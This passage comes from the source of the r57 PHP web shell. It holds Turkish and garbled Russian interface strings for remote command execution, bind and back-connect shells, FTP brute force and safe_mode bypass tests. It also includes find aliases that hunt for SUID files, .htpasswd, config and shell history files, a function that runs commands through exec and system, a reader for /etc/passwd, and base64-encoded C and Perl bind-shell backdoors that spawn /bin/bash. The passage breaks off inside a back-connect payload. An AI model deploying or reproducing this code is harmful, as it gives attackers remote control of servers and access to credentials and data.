 881 'ru_text32'=>'?????????? PHP ????',
 882 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
 883 'ru_butt8' =>'?????????',
 884 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
 885 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
 886 'ru_text36'=>'???? . ???????',
 887 'ru_text37'=>'?????',
 888 'ru_text38'=>'??????',
 889 'ru_text39'=>'????',
 890 'ru_text40'=>'???? ??????? ???? ??????',
 891 'ru_butt9' =>'????',
 892 'ru_text41'=>'????????? ? ?????',
 893 'ru_text42'=>'?????????????? ?????',
 894 'ru_text43'=>'????????????? ????',
 895 'ru_butt10'=>'?????????',
 896 'ru_butt11'=>'?????????????',
 897 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
 898 'ru_text45'=>'???? ????????',
 899 'ru_text46'=>'???????? phpinfo()',
 900 'ru_text47'=>'???????? ???????? php.ini',
 901 'ru_text48'=>'???????? ????????? ??????',
 902 'ru_text49'=>'???????? ??????? ? ???????',
 903 'ru_text50'=>'?????????? ? ??????????',
 904 'ru_text51'=>'?????????? ? ??????',
 905 'ru_text52'=>'????? ??? ??????',
 906 'ru_text53'=>'?????? ? ?????',
 907 'ru_text54'=>'????? ?????? ? ??????',
 908 'ru_butt12'=>'?????',
 909 'ru_text55'=>'?????? ? ??????',
 910 'ru_text56'=>'?????? ?? ???????',
 911 'ru_text57'=>'???????/??????? ????/??????????',
 912 'ru_text58'=>'???',
 913 'ru_text59'=>'????',
 914 'ru_text60'=>'??????????',
 915 'ru_butt13'=>'???????/???????',
 916 'ru_text61'=>'???? ??????',
 917 'ru_text62'=>'?????????? ???????',
 918 'ru_text63'=>'???? ??????',
 919 'ru_text64'=>'?????????? ???????',
 920 'ru_text65'=>'???????',
 921 'ru_text66'=>'???????',
 922 'ru_text67'=>'Chown/Chgrp/Chmod',
 923 'ru_text68'=>'???????',
 924 'ru_text69'=>'????????1',
 925 'ru_text70'=>'????????2',
 926 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
 927 'ru_text72'=>'????? ??? ??????',
 928 'ru_text73'=>'?????? ? ?????',
 929 'ru_text74'=>'?????? ? ??????',
 930 'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
 931 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
 932 'ru_text80'=>'???',
 933 'ru_text81'=>'????',
 934 'ru_text82'=>'???? ??????',
 935 'ru_text83'=>'?????????? SQL ???????',
 936 'ru_text84'=>'SQL ??????',
 937 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
 938 'ru_text86'=>'?????????? ????? ? ???????',
 939 'ru_butt14'=>'???????',
 940 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
 941 'ru_text88'=>'FTP-??????:????',
 942 'ru_text89'=>'???? ?? ftp ???????',
 943 'ru_text90'=>'????? ????????',
 944 'ru_text91'=>'???????????? ?',
 945 'ru_text92'=>'??? ?????????',
 946 'ru_text93'=>'FTP',
 947 'ru_text94'=>'FTP-????????',
 948 'ru_text95'=>'?????? ?????????????',
 949 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
 950 'ru_text97'=>'????????? ??????????: ',
 951 'ru_text98'=>'??????? ???????????: ',
 952 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
 953 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
 954 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
 955 'ru_text102'=>'?????',
 956 'ru_text103'=>'???????? ??????',
 957 'ru_text104'=>'???????? ????? ?? ???????? ????',
 958 'ru_text105'=>'????',
 959 'ru_text106'=>'??',
 960 'ru_text107'=>'????',
 961 'ru_butt15'=>'?????????',
 962 'ru_text108'=>'????? ??????',
 963 'ru_text109'=>'????????',
 964 'ru_text110'=>'??????????',
 965 'ru_text111'=>'SQL-?????? : ????',
 966 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
 967 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
 968 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
 969 /* --------------------------------------------------------------- */
 970 'tur_text1' =>'Komut uygula',
 971 'tur_text2' =>'Server uzerinde komut uygula',
 972 'tur_text3' =>'Komut calistir gulum',
 973 'tur_text4' =>'simdi burdasin',
 974 'tur_text5' =>'Servera dosya yukle',
 975 'tur_text6' =>'Yerel dosya',
 976 'tur_text7' =>'Aliases',
 977 'tur_text8' =>'Select alias',
 978 'tur_butt1' =>'taam gulum :)',
 979 'tur_butt2' =>'y&#252;kle bilader',
 980 'tur_text9' =>'Bind port to /bin/bash',
 981 'tur_text10'=>'Port',
 982 'tur_text11'=>'Password for access',
 983 'tur_butt3' =>'Bind',
 984 'tur_text12'=>'Arka taraf',
 985 'tur_text13'=>'IP',
 986 'tur_text14'=>'Port',
 987 'tur_butt4' =>'Rootlucam baglan lutfen',
 988 'tur_text15'=>'Uzak serverdan dosya yukle',
 989 'tur_text16'=>'Ile',
 990 'tur_text17'=>'Remote file',
 991 'tur_text18'=>'Local file',
 992 'tur_text19'=>'Exploits',
 993 'tur_text20'=>'Kullan',
 994 'tur_text21'=>'&nbsp;yeni isim ver abi',
 995 'tur_text22'=>'datapipe',
 996 'tur_text23'=>'Local port',
 997 'tur_text24'=>'Remote host',
 998 'tur_text25'=>'Remote port',
 999 'tur_text26'=>'Kullan',
1000 'tur_butt5' =>'Calistir',
1001 'tur_text28'=>'Su anki durum safe_mode',
1002 'tur_text29'=>'ACCESS DENIED',
1003 'tur_butt6' =>'d&#252;zenle bilader',
1004 'tur_text30'=>'Cat file',
1005 'tur_butt7' =>'bakabilirmiyim abi',
1006 'tur_text31'=>'&#246;yle bi dosya yok bilader',
1007 'tur_text32'=>'Eval PHP code',
1008 'tur_text33'=>'Test bypass open_basedir with cURL functions',
1009 'tur_butt8' =>'Test',
1010 'tur_text34'=>'Test bypass safe_mode with include function',
1011 'tur_text35'=>'Test bypass safe_mode with load file in mysql',
1012 'tur_text36'=>'Database . Tablo',
1013 'tur_text37'=>'Giris',
1014 'tur_text38'=>'Sifre',
1015 'tur_text39'=>'Database',
1016 'tur_text40'=>'Bosaltilacak database tablosu',
1017 'tur_butt9' =>'Bosalt',
1018 'tur_text41'=>'Bosaltilan dosyayi kaydet',
1019 'tur_text42'=>'Dosyalari duzenle',
1020 'tur_text43'=>'Dosya duzenle',
1021 'tur_butt10'=>'taam basabiliriz :)',
1022 'tur_text44'=>'malesef gulum! sansina kus!',
1023 'tur_text45'=>'taam bilader kaydettim',
1024 'tur_text46'=>'Goster phpinfo()',
1025 'tur_text47'=>'Degiskenleri goster php.ini',
1026 'tur_text48'=>'Temp doslarini sil',
1027 'tur_butt11'=>'duzenle abi',
1028 'tur_text49'=>'Serverdan script sil',
1029 'tur_text50'=>'Islemci bilgisine bak',
1030 'tur_text51'=>'Haf?za bilgisine bak',
1031 'tur_text52'=>'Metin ara',
1032 'tur_text53'=>'In dirs',
1033 'tur_text54'=>'Dosyalarin icinde metin ara',
1034 'tur_butt12'=>'Ara',
1035 'tur_text55'=>'Dosyalarda',
1036 'tur_text56'=>'Hicbirsey :(',
1037 'tur_text57'=>'Yarat/Dosya sil/Dir',
1038 'tur_text58'=>'isim',
1039 'tur_text59'=>'dosya',
1040 'tur_text60'=>'dir',
1041 'tur_butt13'=>'Yarat/Sil',
1042 'tur_text61'=>'Dosya yaratildi',
1043 'tur_text62'=>'Dir created',
1044 'tur_text63'=>'Dosya silindi',
1045 'tur_text64'=>'Dir deleted',
1046 'tur_text65'=>'Yarat',
1047 'tur_text66'=>'Sil',
1048 'tur_text67'=>'Chown/Chgrp/Chmod',
1049 'tur_text68'=>'Komut',
1050 'tur_text69'=>'param1',
1051 'tur_text70'=>'param2',
1052 'tur_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1053 'tur_text72'=>'Metin icin ara',
1054 'tur_text73'=>'Klasor icin ara',
1055 'tur_text74'=>'Dosyalarin icinde ara',
1056 'tur_text75'=>'* you can use regexp',
1057 'tur_text76'=>'Search text in files via find',
1058 'tur_text80'=>'Type',
1059 'tur_text81'=>'Net',
1060 'tur_text82'=>'Databases',
1061 'tur_text83'=>'SQL da sorgula',
1062 'tur_text84'=>'SQL sor',
1063 'tur_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1064 'tur_text86'=>'Serverdan dosya indir',
1065 'tur_butt14'=>'Indir',
1066 'tur_text87'=>'Uzak ftp sunucusundan doysa indir',
1067 'tur_text88'=>'FTP-server:port',
1068 'tur_text89'=>'Ftp de dosya',
1069 'tur_text90'=>'Transfer modu',
1070 'tur_text91'=>'Arsivleme',
1071 'tur_text92'=>'without archivation',
1072 'tur_text93'=>'FTP',
1073 'tur_text94'=>'FTP-bruteforce',
1074 'tur_text95'=>'Kullanici listesi',
1075 'tur_text96'=>'Can\'t get users list',
1076 'tur_text97'=>'checked: ',
1077 'tur_text98'=>'success: ',
1078 'tur_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre',
1079 'tur_text100'=>'Uzak ftp sunucusuna dosya yolla',
1080 'tur_text101'=>'Use reverse (user -> resu) login for password',
1081 'tur_text102'=>'Mail',
1082 'tur_text103'=>'Mail yolla',
1083 'tur_text104'=>'Dosyayi maile yolla',
1084 'tur_text105'=>'To',
1085 'tur_text106'=>'From',
1086 'tur_text107'=>'Subj',
1087 'tur_butt15'=>'Yolla',
1088 'tur_text108'=>'Mail',
1089 'tur_text109'=>'Hide',
1090 'tur_text110'=>'Goster',
1091 'tur_text111'=>'SQL-Server : Port',
1092 'tur_text112'=>'Test bypass safe_mode with function mb_send_mail',
1093 'tur_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1094 'tur_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1095 );
1096 /*
1097 ?????? ??????
1098 ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
1099 ?? ?????? ???? ????????? ??? ???????? ???????.
1100 */
1101 $aliases=array(
1102 'find suid files'=>'find / -type f -perm -04000 -ls',
1103 'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
1104 'find sgid files'=>'find / -type f -perm -02000 -ls',
1105 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
1106 'find config.inc.php files'=>'find / -type f -name config.inc.php',
1107 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
1108 'find config* files'=>'find / -type f -name "config*"',
1109 'find config* files in current dir'=>'find . -type f -name "config*"',
1110 'find all writable files'=>'find / -type f -perm -2 -ls',
1111 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
1112 'find all writable directories'=>'find /  -type d -perm -2 -ls',
1113 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
1114 'find all writable directories and files'=>'find / -perm -2 -ls',
1115 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
1116 'find all service.pwd files'=>'find / -type f -name service.pwd',
1117 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
1118 'find all .htpasswd files'=>'find / -type f -name .htpasswd',
1119 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
1120 'find all .bash_history files'=>'find / -type f -name .bash_history',
1121 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
1122 'find all .mysql_history files'=>'find / -type f -name .mysql_history',
1123 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
1124 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
1125 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
1126 'list file attributes on a Linux second extended file system'=>'lsattr -va',
1127 'show opened ports'=>'netstat -an | grep -i listen',
1128 '----------------------------------------------------------------------------------------------------'=>'ls -la'
1129 );
1130 $table_up1  = "<tr><td bgcolor=#396D95><font face=Verdana size=-2><b><div align=center>:: ";
1131 $table_up2  = " ::</div></b></font></td></tr><tr><td>";
1132 $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95>";
1133 $table_end1 = "</td></tr>";
1134 $arrow = " <font face=Wingdings color=gray>?</font>";
1135 $lb = "<font color=black>[</font>";
1136 $rb = "<font color=black>]</font>";
1137 $font = "<font face=Verdana size=-2>";
1138 $ts = "<table class=table1 width=100% align=center>";
1139 $te = "</table>";
1140 $fs = "<form name=form method=POST>";
1141 $fe = "</form>";
1142 
1143 if(isset($_GET['users']))
1144  {
1145  if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange>".$lang[$language.'_text96']."</font></center>"; }
1146  else
1147   {
1148   echo '<center>';
1149   foreach($users as $user) { echo $user."<br>"; }
1150   echo '</center>';
1151   }
1152  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1153  }
1154 
1155 if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
1156 $dir = @getcwd();
1157 $windows = 0;
1158 $unix = 0;
1159 if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
1160 if(empty($dir))
1161  {
1162  $os = getenv('OS');
1163  if(empty($os)){ $os = php_uname(); }
1164  if(empty($os)){ $os ="-"; $unix=1; }
1165  else
1166     {
1167     if(@eregi("^win",$os)) { $windows = 1; }
1168     else { $unix = 1; }
1169     }
1170  }
1171 if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1172   {
1173     echo $head;
1174     if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1175     else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
1176     $sr->SearchText(0,0);
1177     $res = $sr->GetResultFiles();
1178     $found = $sr->GetMatchesCount();
1179     $titles = $sr->GetTitles();
1180     $r = "";
1181     if($found > 0)
1182     {
1183       $r .= "<TABLE width=100%>";
1184       foreach($res as $file=>$v)
1185       {
1186         $r .= "<TR>";
1187         $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
1188         $r .= ($windows)? str_replace("/","\\",$file) : $file;
1189         $r .= "</b></font></ TD>";
1190         $r .= "</TR>";
1191         foreach($v as $a=>$b)
1192         {
1193           $r .= "<TR>";
1194           $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1195           $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1196           $r .= "</TR>\n";
1197         }
1198       }
1199       $r .= "</TABLE>";
1200     echo $r;
1201     }
1202     else
1203     {
1204       echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1205     }
1206   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1207   die();
1208   }
1209 if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
1210 $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1211 if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
1212 function ws($i)
1213 {
1214 return @str_repeat("&nbsp;",$i);
1215 }
1216 function ex($cfe)
1217 {
1218  $res = '';
1219  if (!empty($cfe))
1220  {
1221   if(function_exists('exec'))
1222    {
1223     @exec($cfe,$res);
1224     $res = join("\n",$res);
1225    }
1226   elseif(function_exists('shell_exec'))
1227    {
1228     $res = @shell_exec($cfe);
1229    }
1230   elseif(function_exists('system'))
1231    {
1232     @ob_start();
1233     @system($cfe);
1234     $res = @ob_get_contents();
1235     @ob_end_clean();
1236    }
1237   elseif(function_exists('passthru'))
1238    {
1239     @ob_start();
1240     @passthru($cfe);
1241     $res = @ob_get_contents();
1242     @ob_end_clean();
1243    }
1244   elseif(@is_resource($f = @popen($cfe,"r")))
1245   {
1246    $res = "";
1247    while(!@feof($f)) { $res .= @fread($f,1024); }
1248    @pclose($f);
1249   }
1250  }
1251  return $res;
1252 }
1253 function get_users()
1254 {
1255   $users = array();
1256   $rows=file('/etc/passwd');
1257   if(!$rows) return 0;
1258   foreach ($rows as $string)
1259    {
1260        $user = @explode(":",$string);
1261        if(substr($string,0,1)!='#') array_push($users,$user[0]);
1262    }
1263   return $users;
1264 }
1265 function we($i)
1266 {
1267 if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
1268 else { $text = "[-] ERROR! Can't write in file "; }
1269 echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1270 return null;
1271 }
1272 function re($i)
1273 {
1274 if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
1275 else { $text = "[-] ERROR! Can't read file "; }
1276 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1277 return null;
1278 }
1279 function ce($i)
1280 {
1281 if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
1282 else { $text = "Can't create "; }
1283 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1284 return null;
1285 }
1286 function fe($l,$n)
1287 {
1288 $text['ru']  = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');
1289 $text['tur'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
1290 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
1291 return null;
1292 }
1293 function mr($l,$n)
1294 {
1295 $text['ru']  = array('?? ??????? ????????? ??????','?????? ??????????');
1296 $text['tur'] = array('Can\'t send mail','Mail sent');
1297 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
1298 return null;
1299 }
1300 function perms($mode)
1301 {
1302 if ($GLOBALS['windows']) return 0;
1303 if( $mode & 0x1000 ) { $type='p'; }
1304 else if( $mode & 0x2000 ) { $type='c'; }
1305 else if( $mode & 0x4000 ) { $type='d'; }
1306 else if( $mode & 0x6000 ) { $type='b'; }
1307 else if( $mode & 0x8000 ) { $type='-'; }
1308 else if( $mode & 0xA000 ) { $type='l'; }
1309 else if( $mode & 0xC000 ) { $type='s'; }
1310 else $type='u';
1311 $owner["read"] = ($mode & 00400) ? 'r' : '-';
1312 $owner["write"] = ($mode & 00200) ? 'w' : '-';
1313 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
1314 $group["read"] = ($mode & 00040) ? 'r' : '-';
1315 $group["write"] = ($mode & 00020) ? 'w' : '-';
1316 $group["execute"] = ($mode & 00010) ? 'x' : '-';
1317 $world["read"] = ($mode & 00004) ? 'r' : '-';
1318 $world["write"] = ($mode & 00002) ? 'w' : '-';
1319 $world["execute"] = ($mode & 00001) ? 'x' : '-';
1320 if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1321 if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1322 if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1323 $s=sprintf("%1s", $type);
1324 $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1325 $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1326 $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1327 return trim($s);
1328 }
1329 function in($type,$name,$size,$value)
1330 {
1331  $ret = "<input type=".$type." name=".$name." ";
1332  if($size != 0) { $ret .= "size=".$size." "; }
1333  $ret .= "value=\"".$value."\">";
1334  return $ret;
1335 }
1336 function which($pr)
1337 {
1338 $path = ex("which $pr");
1339 if(!empty($path)) { return $path; } else { return $pr; }
1340 }
1341 function cf($fname,$text)
1342 {
1343  $w_file=@fopen($fname,"w") or we($fname);
1344  if($w_file)
1345  {
1346  @fputs($w_file,@base64_decode($text));
1347  @fclose($w_file);
1348  }
1349 }
1350 function sr($l,$t1,$t2)
1351  {
1352  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1353  }
1354 if (!@function_exists("view_size"))
1355 {
1356 function view_size($size)
1357 {
1358  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1359  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1360  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1361  else {$size = $size . " B";}
1362  return $size;
1363 }
1364 }
1365   function DirFilesR($dir,$types='')
1366   {
1367     $files = Array();
1368     if(($handle = @opendir($dir)))
1369     {
1370       while (false !== ($file = @readdir($handle)))
1371       {
1372         if ($file != "." && $file != "..")
1373         {
1374           if(@is_dir($dir."/".$file))
1375             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1376           else
1377           {
1378             $pos = @strrpos($file,".");
1379             $ext = @substr($file,$pos,@strlen($file)-$pos);
1380             if($types)
1381             {
1382               if(@in_array($ext,explode(';',$types)))
1383                 $files[] = $dir."/".$file;
1384             }
1385             else
1386               $files[] = $dir."/".$file;
1387           }
1388         }
1389       }
1390       @closedir($handle);
1391     }
1392     return $files;
1393   }
1394   class SearchResult
1395   {
1396     var $text;
1397     var $FilesToSearch;
1398     var $ResultFiles;
1399     var $FilesTotal;
1400     var $MatchesCount;
1401     var $FileMatschesCount;
1402     var $TimeStart;
1403     var $TimeTotal;
1404     var $titles;
1405     function SearchResult($dir,$text,$filter='')
1406     {
1407       $dirs = @explode(";",$dir);
1408       $this->FilesToSearch = Array();
1409       for($a=0;$a<count($dirs);$a++)
1410         $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1411       $this->text = $text;
1412       $this->FilesTotal = @count($this->FilesToSearch);
1413       $this->TimeStart = getmicrotime();
1414       $this->MatchesCount = 0;
1415       $this->ResultFiles = Array();
1416       $this->FileMatchesCount = Array();
1417       $this->titles = Array();
1418     }
1419     function GetFilesTotal() { return $this->FilesTotal; }
1420     function GetTitles() { return $this->titles; }
1421     function GetTimeTotal() { return $this->TimeTotal; }
1422     function GetMatchesCount() { return $this->MatchesCount; }
1423     function GetFileMatchesCount() { return $this->FileMatchesCount; }
1424     function GetResultFiles() { return $this->ResultFiles; }
1425     function SearchText($phrase=0,$case=0) {
1426     $qq = @explode(' ',$this->text);
1427     $delim = '|';
1428       if($phrase)
1429         foreach($qq as $k=>$v)
1430           $qq[$k] = '\b'.$v.'\b';
1431       $words = '('.@implode($delim,$qq).')';
1432       $pattern = "/".$words."/";
1433       if(!$case)
1434         $pattern .= 'i';
1435       foreach($this->FilesToSearch as $k=>$filename)
1436       {
1437         $this->FileMatchesCount[$filename] = 0;
1438         $FileStrings = @file($filename) or @next;
1439         for($a=0;$a<@count($FileStrings);$a++)
1440         {
1441           $count = 0;
1442           $CurString = $FileStrings[$a];
1443           $CurString = @Trim($CurString);
1444           $CurString = @strip_tags($CurString);
1445           $aa = '';
1446           if(($count = @preg_match_all($pattern,$CurString,$aa)))
1447           {
1448             $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1449             $this->ResultFiles[$filename][$a+1] = $CurString;
1450             $this->MatchesCount += $count;
1451             $this->FileMatchesCount[$filename] += $count;
1452           }
1453         }
1454       }
1455       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1456     }
1457   }
1458   function getmicrotime()
1459   {
1460     list($usec,$sec) = @explode(" ",@microtime());
1461     return ((float)$usec + (float)$sec);
1462   }
1463 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1464 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1465 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1466 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1467 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1468 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1469 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1470 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1471 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1472 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1473 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1474 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1475 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1476 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1477 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1478 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1479 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1480 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1481 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1482 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1483 lIENPTk47DQpleGl0IDA7DQp9DQp9";
1484 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
